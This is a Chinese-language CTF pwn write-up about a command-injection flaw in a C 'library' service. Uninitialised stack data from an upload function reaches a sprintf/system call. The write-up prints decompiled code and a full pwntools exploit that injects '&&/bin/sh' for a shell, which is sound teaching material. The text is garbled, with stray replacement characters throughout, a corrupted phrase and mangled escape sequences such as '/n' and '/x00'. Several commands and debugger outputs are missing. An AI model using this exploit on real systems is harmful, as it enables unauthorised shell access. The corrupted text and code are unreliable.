0x00 前言
這種命令行注入在pwn中出現的比較少��,所以記錄分享一下��。
0x01 命令行注入介紹
熟悉web安全的話就知道��,如果對特殊字符過濾不當��,會引發sql注入或者xss等安全漏洞��。其中��,命令行注入較為嚴重��,因為可以直接拿到漏洞程序當前權限的OSshell��。
然而��,命令行注入不僅在web中會出現��,在C語言程序中��,也會出現命令行注入的漏洞��。比方說這道pwn題��,就是調用system時��,沒有對輸入數據進行/0截斷以及對特殊字符處理不當而導致的��。
命令行注入相對于其他二進制漏洞相比利用比較簡單��,比方說這道題��,舉個例子:
sprintf(&s, "du -sh lib/'%s'", v6);system(&s);
其中設計初衷��,v6應當是一個合法的文件名��。但是如果攻擊者惡意操控v6��,比方說��,讓v6為:'&&/bin/sh'
進行sprintf拼接后��,system所執行的命令為:
這里有兩個linux命令行的知識:
&&��,這是拼接兩個命令��,如果我們執行 command1&&command2,那么等價于先執行command1在執行command2��。其中命令跟&&之間不必加空格��。
在命令后不加空格的''(兩個單引號)會被忽略��,比如ls''等價于ls��,/bin/sh''等價于/bin/sh,du -sh lib/''等價于du -sh lib/(即��,實際傳進去的參數是lib/不是lib/'')
所以��,執行上面的命令��,相當于先執行了
再執行
所以��,可以getshell��。
0x02 題目
題目所給的是一個library的服務��,可以上傳book��,查看books��,清除books��。其中��,book存放在lib/文件夾中��。
0x03 漏洞點
char *list_books(){ FILE *v0; // eax char *result; // eax char s; // [esp+4h] [ebp-C14h] char ptr; // [esp+804h] [ebp-414h] char *v4; // [esp+C04h] [ebp-14h] FILE *stream; // [esp+C08h] [ebp-10h] char *v6; // [esp+C0Ch] [ebp-Ch] v0 = popen("ls lib/", "r"); stream = v0; result = (char *)fread(&ptr, 1u, 0x400u, v0); v4 = result; if ( result ) { v6 = strtok(&ptr, delims); result = (char *)send("Book list:/nSize/tE-book/n"); while ( v6 ) { sprintf(&s, "du -sh lib/'%s'", v6); //很明顯,這里存在可能的命令行注入 system(&s); fflush(stdout); result = strtok(0, delims); v6 = result; } } return result; 其中list_books代碼如上,v6來自fread從popen中的返回結果��。他本來想做的是輸出每個文件的大小��,但是fread后沒有用/0截斷��。所以調用strtok時��,可能會讀到fread后面的垃圾數據(當然如果可以操控的話就不是垃圾數據了)
sprintf的棧溢出會比較難利用��,因為&s比較大��,有0x800��,而v6是從&ptr里面strtok出來的��,而&ptr更小��,只有0x400��。所以應該沒法很好的利用��。
0x04 操控垃圾數據
那么,我們怎么去操控&ptr中的垃圾數據呢��?這個時候看看另外一個函數
int upload_book(){ char *v1; // eax int v2; // eax char buf[1024]; // [esp+Ch] [ebp-42Ch] char s[20]; // [esp+40Ch] [ebp-2Ch] FILE *stream; // [esp+420h] [ebp-18h] char *dest; // [esp+424h] [ebp-14h] size_t v7; // [esp+428h] [ebp-10h] int v8; // [esp+42Ch] [ebp-Ch] if ( book_counter > 10 ) return send("too many books/n"); send("Book filename: "); v8 = __isoc99_scanf("%20s", s); if ( v8 != 1 ) return send("Wrong title format/n"); v7 = strlen(s); if ( strcmp(&s[v7 - 3], ".bk") ) return send("The name needs to end with '.bk'/n"); send("e-book contents: /n"); read(0, buf, 0x400u); if ( *(_DWORD *)buf != 'BBBB' ) return send("Not an e-book/naborting.../n"); v1 = (char *)malloc(0x18u); dest = v1; *(_DWORD *)v1 = 0x2F62696C; v1[4] = 0; strcat(dest, s); stream = fopen(dest, "w"); if ( !stream ) return send("Bad book filename/n"); v2 = book_counter++; books[v2] = dest; fwrite(buf, 1u, 0x400u, stream); return fclose(stream);} 其中,這在棧中也會分配0x400個字節��,并且我們可以寫入��。
并且��,調用完這個函數之后��,清除?�?臻g時��,只是簡單地add esp,xxx,并不會清空其中數據��。然后��,再調用存在命令行注入的函數并分配?�?臻g時��,也只是單純地sub esp,xxx��,也不會清空數據��。在C語言中,如果此時對不賦值的局部變量直接訪問的話��,是UB行為��。但是��,從二進制安全的角度看的話��,便是可利用的點了��。其中這道題��,本身就是一個局部字符串讀取后未截斷而造成的UB��,然而我們便可以利用這個��。
那么來試試:
很明顯,BBBB123456789123456789123456789123456789AAAA的后面89123456789AAAA被拼接到du -sh lib/'%s'中了
動態調試看一下的話
第一次在system停下
第二次在system停下
所以很明顯��,只要把89123456789AAAA改成
就可以getshell了��。如前面所說��。
其中��,/x00是我們自己手動截斷,不然strtok還會繼續往后讀��。
所以最后exp
#BBBB1234567891234567891234567'&&/bin/sh'g_local = True from pwn import * if g_local: sh=process("./library")else: sh=remote("xxxx",1234) def upload_book(filename, content): filename += ".bk" sh.send("1/n") sh.recvuntil("Book filename: ") print filename sh.send(filename + "/n") sh.recvuntil("e-book contents: /n") sh.send(content) sh.recvuntil("Enter command: ") def list_books_and_shell(): sh.send("2/n") sh.interactive() upload_book("1", "BBBB1234567891234567891234567/'&&/bin/sh/'/x00")list_books_and_shell() 0x05 后言
還有一點要注意��,pwndbg好像會默認在fork時跟子進程��,所以要在~/.gdbinit的最后面(加載pwndbg之后)加上set follow-fork-mode parent��。并且��,&&與命令之間不能加空格��。因為他strtok是通過空格和換行分斷字符串的��,加了空格我們的payload就會被strtok分割開��。
總結
以上就是這篇文章的全部內容了��,希望本文的內容對大家的學習或者工作具有一定的參考學習價值��,如果有疑問大家可以留言交流��,謝謝大家對VEVB武林網的支持��。
